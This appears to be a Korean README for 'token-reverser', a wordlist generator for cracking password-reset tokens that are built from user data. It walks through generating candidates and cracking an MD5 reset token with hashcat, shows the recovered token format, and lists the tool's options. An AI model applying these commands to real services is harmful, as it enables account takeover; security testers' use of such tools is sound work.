
보안 토큰 크랙을 위한 단어 목록 생성기
보안 토큰을 크랙하기 위한 단어 목록 생성기.
$ git clone https://github.com/dariusztytko/token-reverser.git
비밀번호 재설정 기능을 테스트 중입니다.
재설정 비밀번호 토큰이 이메일로 전송되었습니다 (예: 582431d4c7b57cb4a3570041ffeb7e10).
이 토큰이 가입 시 입력한 데이터의 md5 해시라고 가정합니다.
가입 시 다음 데이터를 입력했습니다:
또한, 다음과 같은 추가 데이터에 접근할 수 있습니다:
Token Reverser를 사용하여 알려진 데이터로 단어 목록을 생성합니다:
python3 token-reverser.py --date "Tue, 10 Mar 2020 17:12:59 GMT" Foo Bar [email protected] 1985-05-23 202-555-0185 "3634 Forest Drive" 74824 > words
hashcat을 사용하여 재설정 비밀번호 토큰을 크랙합니다:
hashcat64.exe -m 0 582431d4c7b57cb4a3570041ffeb7e10 words
hashcat (v5.1.0) starting...
[...]
582431d4c7b57cb4a3570041ffeb7e10:[email protected]!1583860379
Session..........: hashcat
Status...........: Cracked
Hash.Type........: MD5
Hash.Target......: 582431d4c7b57cb4a3570041ffeb7e10
[...]
이제 재설정 비밀번호 토큰이 다음과 같이 생성된다는 것을 알게 되었습니다:
md5(사용자 ID!이름!성!이메일!현재 타임스탬프)
usage: token-reverser.py [-h] [-d DATE] [-o TIMESTAMP_OFFSET] [-s SEPARATORS]
data [data ...]
보안 토큰 크랙을 위한 단어 목록 생성기 v1.2
positional arguments:
data 데이터 조각들
optional arguments:
-h, --help 이 도움말 메시지를 표시하고 종료합니다
-d DATE, --date DATE 이 날짜의 타임스탬프를 추가 데이터 조각으로 사용합니다,
예: Tue, 10 Mar 2020 14:06:36 GMT
-o TIMESTAMP_OFFSET, --timestamp-offset TIMESTAMP_OFFSET
날짜로부터의 타임스탬프보다 이전 몇 개의 타임스탬프를
추가 데이터 조각으로 사용할지 지정합니다, 기본값: 1
-s SEPARATORS, --separators SEPARATORS
확인할 데이터 조각 구분 기호, 기본값:
~`!@#$%^&*()_+-={}|[]\:";'<>?,./ \t
CHANGELOG를 참조하십시오.